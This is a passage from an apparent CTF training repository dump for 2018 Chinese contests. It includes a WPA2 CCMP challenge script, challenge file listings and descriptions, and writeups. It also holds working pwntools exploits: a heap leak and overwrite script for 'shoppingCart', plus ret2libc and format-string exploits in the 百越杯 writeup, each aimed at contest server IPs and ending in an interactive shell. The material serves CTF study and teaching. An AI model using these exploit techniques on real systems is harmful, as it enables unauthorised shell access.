 71 |     B0 += chr((data_len >> 8) & 0xFF)
 72 |     B0 += chr(data_len & 0xFF)
 73 | 
 74 |     AAD = '\x00' * 2  # [0] [1]
 75 | 
 76 |     AAD += chr(ord(inputpkt[0]) & 0x8F)  # [2]
 77 |     AAD += chr(ord(inputpkt[1]) & 0xC7)  # [3]
 78 |     AAD += inputpkt[4:4 + 3 * 6]  # [4]..[21]
 79 |     AAD += chr(ord(inputpkt[22]) & 0x0F)  # [22]
 80 | 
 81 |     AAD += '\x00'  # [23]
 82 | 
 83 |     if (is_a4):
 84 |         AAD += inputpkt[24:24 + 6]  # [24]..[29]
 85 |         if (is_qos):
 86 |             AAD += chr(ord(inputpkt[z - 2]) & 0x0F)  # [30]
 87 |             AAD += '\x00'  # [31]
 88 |             tmp = list(B0)
 89 |             tmp[1] = AAD[30]
 90 |             B0 = ''.join(tmp)
 91 |             tmp = list(AAD)
 92 |             tmp[1] = chr(22 + 2 + 6)
 93 |             AAD = ''.join(tmp)
 94 |         else:
 95 |             AAD += '\x00' * 2  # [30]..[31]
 96 |             tmp = list(B0)
 97 |             tmp[1] = '\x00'
 98 |             B0 = ''.join(tmp)
 99 |             tmp = list(AAD)
100 |             tmp[1] = chr(22 + 6)
101 |             AAD = ''.join(tmp)
102 |     else:
103 |         if (is_qos):
104 |             AAD += chr(ord(inputpkt[z - 2]) & 0x0F)  # [24]
105 |             AAD += '\x00'  # [25]
106 |             tmp = list(B0)
107 |             tmp[1] = AAD[24]
108 |             B0 = ''.join(tmp)
109 |             tmp = list(AAD)
110 |             tmp[1] = chr(22 + 2)
111 |             AAD = ''.join(tmp)
112 |         else:
113 |             AAD += '\x00' * 2  # [24]..[25]
114 |             tmp = list(B0)
115 |             tmp[1] = '\x00'
116 |             B0 = ''.join(tmp)
117 |             tmp = list(AAD)
118 |             tmp[1] = chr(22)
119 |             AAD = ''.join(tmp)
120 |         AAD += '\x00' * 6
121 | 
122 |     cipher = AES.new(TK, AES.MODE_ECB)
123 |     MIC = cipher.encrypt(B0)
124 |     MIC = XOR(MIC, AAD, 16)
125 |     MIC = cipher.encrypt(MIC)
126 |     MIC = XOR(MIC, AAD[16:], 16)
127 |     MIC = cipher.encrypt(MIC)
128 | 
129 |     tmp = list(B0)
130 |     tmp[0] = chr(ord(tmp[0]) & 0x07)
131 |     tmp[14] = '\x00'
132 |     tmp[15] = '\x00'
133 |     B0 = ''.join(tmp)
134 | 
135 |     B = cipher.encrypt(B0)
136 |     initMIC = B
137 | 
138 |     blocks = (data_len + 16 - 1) / 16
139 |     last = data_len % 16
140 |     offset = z + 8
141 | 
142 |     encryptedPacket = ''
143 | 
144 |     for i in range(1, blocks + 1):
145 |         n = last if (last > 0 and i == blocks) else 16
146 |         MIC = XOR(MIC,inputpkt[offset:offset+n],n)
147 |         MIC = cipher.encrypt(MIC)
148 |         tmp = list(B0)
149 |         tmp[14] = chr((i >> 8) & 0xFF)
150 |         tmp[15] = chr(i & 0xFF)
151 |         B0 = ''.join(tmp)
152 |         B = cipher.encrypt(B0)
153 |         out = XOR(inputpkt[offset:offset + n], B, n)
154 |         encryptedPacket += out
155 | 
156 | 
157 |         offset += n
158 | 
159 |     encryptedPacket = inputpkt[:z+8] + encryptedPacket
160 |     encryptedPacket += XOR(initMIC,MIC,8)[:8]
161 | 
162 |     return encryptedPacket
163 | 
164 | if __name__=="__main__":
165 | 
166 | 	print "Welcome to HuWang Bei WPA2 Simulation System.. Initilizing Parameters.."
167 | 	print ""
168 | 	
169 | 	ssid = "HuWang"
170 | 	
171 | 	psk = ''.join(random.choice(string.ascii_uppercase+ string.ascii_lowercase + string.digits) for _ in range(16))
172 | 	rnddev = open("/dev/urandom","rb")
173 | 	
174 | 	aNonce = rnddev.read(32)
175 | 	
176 | 	sNonce = rnddev.read(32)
177 | 	
178 | 	apMac = rnddev.read(6)
179 | 	
180 | 	staMac = rnddev.read(6)
181 | 	
182 | 	rnddev.close()
183 | 	
184 | 	print "SSID = "+ssid
185 | 	print ""
186 | 	
187 | 	print "PSK = "+psk
188 | 	print ""
189 | 	
190 | 	outmac=apMac.encode('hex').upper()
191 | 	macaddr = ''
192 | 	for i in range(len(outmac)):
193 | 		macaddr += outmac[i]
194 | 		if (i%2!=0 and i<len(outmac)-1):
195 | 			macaddr+=':'
196 | 	print "AP_MAC = "+macaddr
197 | 	print ""
198 | 	
199 | 	print "AP_Nonce = "+aNonce.encode('hex')
200 | 	print ""
201 | 	
202 | 	outmac=staMac.encode('hex').upper()
203 | 	macaddr = ''
204 | 	for i in range(len(outmac)):
205 | 		macaddr += outmac[i]
206 | 		if (i%2!=0 and i<len(outmac)-1):
207 | 			macaddr+=':'
208 | 	
209 | 	print "STA_MAC = "+macaddr
210 | 	print ""
211 | 			
212 | 	print "STA_Nonce = "+sNonce.encode('hex')
213 | 	print ""
214 | 	
215 | 	A,B = MakeAB(aNonce,sNonce,apMac,staMac)
216 | 	
217 | 	ptk,pmk = MakeKeys(psk,ssid,A,B)
218 | 	
219 | 	key = ptk[-16:]
220 | 	
221 | 	chlvalue = ''.join(random.choice(string.ascii_uppercase+ string.ascii_lowercase + string.digits) for _ in range(16))
222 | 	challenge = "Challenge Vlaue: "+chlvalue
223 | 	
224 | 	
225 | 	datapkt = ("88423a01"+staMac.encode('hex')+apMac.encode('hex')+apMac.encode('hex')+"60920000"+"0000002000000000"+challenge.encode('hex')).decode('hex')
226 | 	
227 | 	packetNumber = struct.pack(">Q",random.randint(1,9999999))[2:]
228 | 	
229 | 	outtoUser = EncryptCCMP(datapkt,key,packetNumber)
230 | 	
231 | 	print "CCMP Encrypted Packet = "+outtoUser.encode("hex")
232 | 	print ""
233 | 	
234 | 	userinput = raw_input("Input decrypted challenge value in Packet:")
235 | 	print ""
236 | 	
237 | 	if (userinput == chlvalue):
238 | 		f = open("flag","r")
239 | 		content = f.read()
240 | 		f.close()
241 | 		print "Congratulations!Your flag is: "+content
242 | 	else:
243 | 		print "Wrong!"
244 | 	
245 | 	
246 | 	
247 | 	
248 | 	
249 | 	
250 | 	
251 | 


--------------------------------------------------------------------------------
/2018/护网杯/pwn/calendar/task_calendar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/pwn/calendar/task_calendar


--------------------------------------------------------------------------------
/2018/护网杯/pwn/gettingStart/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/pwn/gettingStart/payload


--------------------------------------------------------------------------------
/2018/护网杯/pwn/gettingStart/task_gettingStart_ktQeERc (2):
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/pwn/gettingStart/task_gettingStart_ktQeERc (2)


--------------------------------------------------------------------------------
/2018/护网杯/pwn/huwang/task_attachment.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/pwn/huwang/task_attachment.zip


--------------------------------------------------------------------------------
/2018/护网杯/pwn/shoppingcart/exp-pwn.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import sys
 3 | 
 4 | context.log_level = "debug"
 5 | context.terminal = ["tmux", "splitw", "-h"]
 6 | 
 7 | if len(sys.argv)>1:
 8 |     p = remote("49.4.79.129", 31089)
 9 | else:
10 |     p = process("./shoppingCart")
11 | 
12 | def add(content):
13 |     p.sendlineafter("man!", str(1))
14 |     p.sendlineafter("Dollar?", content)
15 | 
16 | def back():
17 |     p.sendlineafter("man!", str(3))
18 | 
19 | def menu(ix):
20 |     p.sendlineafter("buy!", str(ix))
21 | 
22 | def buy(size,content):
23 |     menu(1)
24 |     p.sendlineafter("name?", str(size))
25 |     p.sendlineafter("name?", content)
26 | 
27 | def delete(ix):
28 |     menu(2)
29 |     p.sendlineafter("need?", str(ix))
30 | 
31 | def edit(ix, content):
32 |     menu(3)
33 |     p.sendlineafter("modify?", str(ix))
34 |     s = p.recvuntil("to?\n")
35 |     p.send(content)
36 |     return s
37 | 
38 | codebase = 0x555555554000
39 | 
40 | def debug():
41 |     gdb.attach(p, "b * {}\nb *{}\nc".format(hex(codebase+0xc41),
42 |     hex(codebase+0x0BBE)))
43 | 
44 | #debug()
45 | add("A"*7)
46 | back()
47 | buy(0x18, "1234")
48 | 
49 | # leak codebase
50 | menu(3)
51 | s = p.sendlineafter("modify?", str(-0x2f))
52 | p.recvuntil("like to modify ")
53 | codebase = u64(p.recvuntil(" ", drop=True).ljust(8, "\x00"))-0x202068
54 | log.success("codebase: "+hex(codebase))
55 | p.sendafter("to?\n", p64(codebase+0x2021e0))
56 | 
57 | # leak heap
58 | menu(3)
59 | s = p.sendlineafter("modify?", str(-0x2f))
60 | p.recvuntil("like to modify ")
61 | heap = u64(p.recvuntil(" ", drop=True).ljust(8, "\x00"))
62 | log.success("heap: "+hex(heap))
63 | p.sendafter("to?\n", p64(codebase+0x202058))
64 | 
65 | # leak libc
66 | menu(3)
67 | s = p.sendlineafter("modify?", str(0))
68 | p.recvuntil("like to modify ")
69 | strtoul_libc = u64(p.recvuntil(" ", drop=True).ljust(8, "\x00"))
70 | libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
71 | libc.address = strtoul_libc - libc.symbols["strtoul"]
72 | log.success("libc: "+hex(libc.address))
73 | p.sendafter("to?\n", p64(libc.symbols["system"]))
74 | 
75 | # get shell
76 | p.sendlineafter("buy!", "/bin/sh")
77 | 
78 | p.interactive()
79 | 


--------------------------------------------------------------------------------
/2018/护网杯/pwn/shoppingcart/task_shoppingCart:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/pwn/shoppingcart/task_shoppingCart


--------------------------------------------------------------------------------
/2018/护网杯/pwn/six/task_attachments_csyNf1R.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/pwn/six/task_attachments_csyNf1R.zip


--------------------------------------------------------------------------------
/2018/护网杯/红日安全-wp.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/护网杯/红日安全-wp.pdf


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Crypto/Common Crypto/crypto_6CB66A304EB02150BC1747693B252A66.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/Crypto/Common Crypto/crypto_6CB66A304EB02150BC1747693B252A66.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Crypto/Common Crypto/desc.txt:
--------------------------------------------------------------------------------
1 | 
2 | Please enter your flag


--------------------------------------------------------------------------------
/2018/湖湘杯2018/README.md:
--------------------------------------------------------------------------------
1 | ### Writeup
2 | 
3 | 
4 | - [2018湖湘杯wp](https://www.anquanke.com/post/id/164604)
5 | - [湖湘杯wp](https://blog.csdn.net/uiop_uiop_uiop/article/details/84207231)
6 | 


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Reverse/HighwayHash64/desc.txt:
--------------------------------------------------------------------------------
1 | 
2 | 口算哈希说的就是你吧~


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Reverse/HighwayHash64/reverse_4FB03B4915A8D64AF9F4AD20FAD54398.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/Reverse/HighwayHash64/reverse_4FB03B4915A8D64AF9F4AD20FAD54398.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Reverse/More efficient than JS/attach_9550FD3DD9774159E9955E2A0E389842.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/Reverse/More efficient than JS/attach_9550FD3DD9774159E9955E2A0E389842.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Reverse/More efficient than JS/desc.txt:
--------------------------------------------------------------------------------
1 | 
2 | 蓝色的火狐和黄色的谷歌更配哦~


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Reverse/Replace/Replace_B21DA8B2F172C13764989DF0F99B890A.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/Reverse/Replace/Replace_B21DA8B2F172C13764989DF0F99B890A.rar


--------------------------------------------------------------------------------
/2018/湖湘杯2018/Reverse/Replace/desc.txt:
--------------------------------------------------------------------------------
1 | 简单的...密码学~
2 | 
3 | http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/Replace_B21DA8B2F172C13764989DF0F99B890A.rar


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/Disk/desc.txt:
--------------------------------------------------------------------------------
1 | 磁盘隐写，这个磁盘上隐藏着一些秘密，你能找出来吗？


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/Disk/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/misc/Disk/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/Flow/desc.txt:
--------------------------------------------------------------------------------
1 | 流量取证，这个流量包中隐藏着一些秘密，你能找出来吗？


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/Flow/flow_6D1210D1307A67E4A428602F722E6803.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/misc/Flow/flow_6D1210D1307A67E4A428602F722E6803.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/Hidden Write/maomao1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/misc/Hidden Write/maomao1.png


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/Hidden Write/maomao_887FB92FA255BB64B6634626668ADE45.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/misc/Hidden Write/maomao_887FB92FA255BB64B6634626668ADE45.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/ctf-flat.vmdk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/misc/ctf-flat.vmdk


--------------------------------------------------------------------------------
/2018/湖湘杯2018/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/pwn/Hash Burger/desc.txt:
--------------------------------------------------------------------------------
1 | 
2 | I need to find enough POW to eat! 下载地址：http://hxb2018.oss-cn-beijing.aliyuncs.com/pwn/pwn_36E4F0B8449B31AC6BE4C70755AE801D.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/pwn/Hash Burger/pwn_36E4F0B8449B31AC6BE4C70755AE801D.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/pwn/Hash Burger/pwn_36E4F0B8449B31AC6BE4C70755AE801D.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/pwn/Hello World/desc.txt:
--------------------------------------------------------------------------------
1 | Pwn里面的Hello World.
2 | 
3 | 47.107.239.20:8888


--------------------------------------------------------------------------------
/2018/湖湘杯2018/pwn/Regex Format/desc.txt:
--------------------------------------------------------------------------------
1 | How to find match string? 


--------------------------------------------------------------------------------
/2018/湖湘杯2018/pwn/Regex Format/pwn_1D0984F129D563BC739B37E975CC8DF2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/pwn/Regex Format/pwn_1D0984F129D563BC739B37E975CC8DF2.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/web/Code Check/list.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/湖湘杯2018/web/Code Check/list.zip


--------------------------------------------------------------------------------
/2018/湖湘杯2018/web/MyNote/desc.txt:
--------------------------------------------------------------------------------
1 | 跨越了一座，又一座山，才能看到光明~
2 | 
3 | 39.108.167.229:80


--------------------------------------------------------------------------------
/2018/湖湘杯2018/web/Readflag/desc.txt:
--------------------------------------------------------------------------------
1 | 来骗我的flag呀~
2 | 47.107.238.3:80


--------------------------------------------------------------------------------
/2018/百越杯2018/Crypto/RSA_aaef56c99a718d469dcad5fde68941c7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Crypto/RSA_aaef56c99a718d469dcad5fde68941c7.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Crypto/maishouji_fc5eaa869a43d358f8c0a036d859699f.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Crypto/maishouji_fc5eaa869a43d358f8c0a036d859699f.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Misc/flag_universe_f3b2fac7edc9703224e1fcf53fced535.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Misc/flag_universe_f3b2fac7edc9703224e1fcf53fced535.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Misc/manan_df7f4b63114124324c8a36a4b548e15f.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Misc/manan_df7f4b63114124324c8a36a4b548e15f.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Misc/xuexiaoban_210565db66adf7671800807cd9593d06.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Misc/xuexiaoban_210565db66adf7671800807cd9593d06.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Misc/签到.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Misc/签到.png


--------------------------------------------------------------------------------
/2018/百越杯2018/Pwn/bgame_14f6a4f3ce6509b0f8c4bc9c7fdd8dca.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Pwn/bgame_14f6a4f3ce6509b0f8c4bc9c7fdd8dca.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/Pwn/format_130934106884542e1a64a457e3cc5833.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/百越杯2018/Pwn/format_130934106884542e1a64a457e3cc5833.zip


--------------------------------------------------------------------------------
/2018/百越杯2018/README.md:
--------------------------------------------------------------------------------
  1 | # 2018福建省“百越杯”CTF初赛writeup
  2 | ## PWN
  3 | ### Boring Game
  4 | <kbd>题目描述</kbd>   nc 117.50.59.220 12345 
  5 | <kbd>解题经过</kbd>下载下来后有两个文件`pwn`和`libc.so.6`。所以很明显是RET2LIBC的类型
  6 |   
  7 |   #### 检查文件安全性
  8 | 
  9 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181203011412569.png)
 10 | 
 11 | #### 程序源代码
 12 | 
 13 | ```c
 14 | int __cdecl main(int argc, const char **argv, const char **envp)
 15 | {
 16 |   write(1, "Hello, welcome to a boring game.\n", 0x22u);
 17 |   fflush(_bss_start);
 18 |   game();
 19 |   return 0;
 20 | }
 21 | ```
 22 | ```c
 23 | int game()
 24 | {
 25 |   int v1; // [esp+0h] [ebp-58h]
 26 |   char buf[64]; // [esp+4h] [ebp-54h]
 27 |   int v3; // [esp+44h] [ebp-14h]
 28 |   unsigned int seed; // [esp+48h] [ebp-10h]
 29 |   ssize_t v5; // [esp+4Ch] [ebp-Ch]
 30 | 
 31 |   puts("What's your name ?");
 32 |   fflush(_bss_start);
 33 |   v5 = read(0, buf, 0x80u);
 34 |   if ( v5 <= 64 )
 35 |     buf[v5 - 1] = 0;
 36 |   printf("Hi ,%s.  Let's play a game.\nCan you guess a number ? (0 - 1024)\n", buf);
 37 |   fflush(_bss_start);
 38 |   seed = time(0);
 39 |   srand(seed);
 40 |   v3 = rand() % 1025;
 41 |   __isoc99_scanf("%d", &v1);
 42 |   if ( v1 == v3 )
 43 |     printf("Why are so niubi! number is %d\n", v3);
 44 |   else
 45 |     printf("Sorry, you only have one chance here.\nnumber is %d\n", v3);
 46 |   return fflush(_bss_start);
 47 | }
 48 | ```
 49 | 相关函数：
 50 | 
 51 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181203141806456.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)
 52 | #### 解题思路
 53 | >step1： 获取write函数的地址
 54 | >step2： 获取write函数在Libc里面的的偏移
 55 | >step3： 计算出基地址
 56 | >step4： 获取system和“/bin/sh”的偏移
 57 | >step5： 计算system和"/bin/sh”的地址
 58 | >最后getshell
 59 | 
 60 | ##### 测量溢出长度
 61 | 测量得padding88个无效字符后可以控制EIP
 62 | ##### 获取write函数的地址
 63 | 因为write函数一开始就已经使用过，所以这个时候的got表的内容是真实的地址
 64 | 可以使用ELF导入libc后用got函数进行获取
 65 | 或者objdump出汇编代码找到如下信息：
 66 | ```disassemble
 67 | 08048420 <read@plt>:
 68 |  8048420:	ff 25 0c a0 04 08    	jmp    DWORD PTR ds:0x804a00c
 69 |  8048426:	68 00 00 00 00       	push   0x0
 70 |  804842b:	e9 e0 ff ff ff       	jmp    8048410 <.plt>
 71 | ```
 72 | 其中`0x804a00c`就是write函数在got表中的地址
 73 | ##### 获取write函数的偏移
 74 | 这里使用pwntools的elf导入libc库，再用symbols进行定位
 75 | ```python
 76 | from pwn import *
 77 | libc = ELF('libc.so.6')
 78 | write_off = libc.symbols['write']
 79 | ```
 80 | ##### 计算基地址
 81 | 这里就要开始构造payload，目的是让函数在返回的时候控制EIP让它跳转到puts函数，然后把write函数的got表中的值泄露出来。
 82 | `payload = 'a'*88 + p32(puts_addr) + p32(main_addr) + p32(write_got)`
 83 | 泄露之后用真实地址减去偏移就可以得到基地址
 84 | `base_addr =  write_addr - write_off`
 85 | ##### 计算system和"/bin/sh"地址
 86 | ```python
 87 | from pwn import *
 88 | libc = ELF('libc.so.6')
 89 | write_off = libc.symbols['system']
 90 | bin_sh_off = libc.search('/bin/sh').next()
 91 | system_addr = system_off + base_addr 
 92 | bin_sh_addr = bin_sh_off + base_addr
 93 | ```
 94 | 
 95 | #### EXP
 96 | ```python
 97 | from pwn import *
 98 | 
 99 | #context.log_level = 'debug' 
100 | 
101 | libc = ELF('libc.so.6')
102 | p = remote('117.50.59.220',12345)
103 | puts_addr = 0x08048460
104 | main_addr = 0x080486f9
105 | write_off = libc.symbols['write']
106 | system_off = libc.symbols['system']
107 | bin_sh_off = libc.search('/bin/sh').next()
108 | write_got = 0x804a028
109 | #log.info(hex(put_got))
110 | log.info('write_off: '+hex(write_off))
111 | log.info('system_off: '+hex(system_off))
112 | log.info('bin_sh_off: '+hex(bin_sh_off))
113 | 
114 | payload = 'a'*88 + p32(puts_addr) + p32(main_addr) + p32(write_got)
115 | p.recvuntil(" ?")
116 | p.send(payload)
117 | p.recvuntil('? (0 - 1024)\n')
118 | sleep(0.5)
119 | p.sendline('1')
120 | 
121 | print p.recv()
122 | recvinfo = p.recv().split('\n')[1].replace('\x00','')
123 | write_addr = u32(recvinfo)
124 | log.info(hex(write_addr))
125 | base_addr =  write_addr - write_off
126 | system_addr = system_off + base_addr 
127 | bin_sh_addr = bin_sh_off + base_addr
128 | 
129 | print "[*] Got baseaddr =",hex(base_addr)
130 | print "[*] Got execveaddr =",hex(system_addr)
131 | print "[*] Got /bin/sh addr =",hex(bin_sh_addr)
132 | 
133 | payload2 = 'a'*88 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
134 | p.sendline(payload2)
135 | p.recvuntil('? (0 - 1024)\n')
136 | p.sendline('1')
137 | 
138 | p.interactive()
139 | ```
140 | ##### 细节处理
141 | 这里连上服务器之后，在传回来的数据中，泄露的write函数地址会接在其他字符串后面，所以需要处理一下。
142 | 在本地测试的时候传回来的数据内容略有不同，所以如果要在本地调试的话，截取write函数的地址的代码需要做修改。
143 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181203144547148.png)
144 | 
145 | ### Format
146 | 这题几乎是原题，很简单的格式化字符串漏洞题目。
147 | 
148 | <kbd>题目描述</kbd> Maybe wo gen boring   nc 117.50.13.182 33865
149 | 
150 | <kbd>解题经过</kbd>
151 | #### 程序源代码：
152 | ```c
153 | int __cdecl main(int argc, const char **argv, const char **envp)
154 | {
155 |   char s; // [esp+1Ch] [ebp-8Ch]
156 |   unsigned int v5; // [esp+9Ch] [ebp-Ch]
157 | 
158 |   v5 = __readgsdword(0x14u);
159 |   memset(&s, 0, 0x80u);
160 |   fgets(&s, 128, stdin);
161 |   printf(&s);
162 |   if ( secret == 192 )
163 |     give_shell();
164 |   else
165 |     printf("Sorry, secret = %d\n", secret);
166 |   return 0;
167 | }
168 | ```
169 | ```c
170 | int give_shell()
171 | {
172 |   __gid_t v0; // ST1C_4
173 | 
174 |   v0 = getegid();
175 |   setresgid(v0, v0, v0);
176 |   return system("/bin/sh -i");
177 | }
178 | ```
179 | 漏洞点在`printf(&s)`,所以可以用`%x&n`对目标地址中的值进行改写。
180 | 
181 | 本题不需要测量溢出长度，但是需要测量泄露的地址中的内容是从哪里开始是我们需要的：
182 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181203151335858.png)所以输入的开始部分是从第11个开始
183 | 
184 | #### EXP
185 | ```python
186 | from pwn import *
187 | #context.log_level = 'debug'
188 | 
189 | r = remote('117.50.13.182',33865)
190 | #r = process('./format')
191 | 
192 | payload1 = p32(0x0804A048)+'%188u%11$n'
193 | #print payload1 
194 | r.sendline(payload1)
195 | print r.recv()
196 | 
197 | r.interactive()
198 | ```
199 | 
200 | ## MISC
201 | ### 马男波杰克
202 | <kbd>题目描述</kbd>  马男说了要学会百度
203 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/201812052303501.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)
204 | <kbd>解题经过</kbd>
205 | 
206 | 直接使用在线的工具即可
207 | > http://www.atool.org/steganography.php
208 | > 
209 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181205230209477.png)
210 | ### 签到题
211 | <kbd>题目描述</kbd>  欢迎参加百越杯，首先我们得放轻松，活动一下脑经，比如做做数独怎么样？flag格式：flag{全部数字排成一行（横向81位）的小写md5值}
212 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181205233115612.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)
213 | <kbd>解题经过</kbd>
214 | 
215 | 偷个懒，使用在线数独求解器求解数独
216 | >http://www.llang.net/sudoku/calsudoku.html
217 | 
218 | 
219 | ![在这里插入图片描述](https://img-blog.csdnimg.cn/20181205232629481.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NXRUVUMFNXQVQ=,size_16,color_FFFFFF,t_70)
220 | flag{cee3860fb3f4a52e615fa8aaf3c91f2b}
221 | 
222 | ### 血小板天下第一可爱
223 | 
224 | <kbd>题目描述</kbd>  听过LSB隐写吗？
